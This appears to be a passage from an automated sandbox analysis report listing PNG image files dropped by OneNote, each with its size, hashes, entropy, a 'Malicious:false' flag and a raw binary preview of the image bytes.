                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4190
                                                                                                                                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
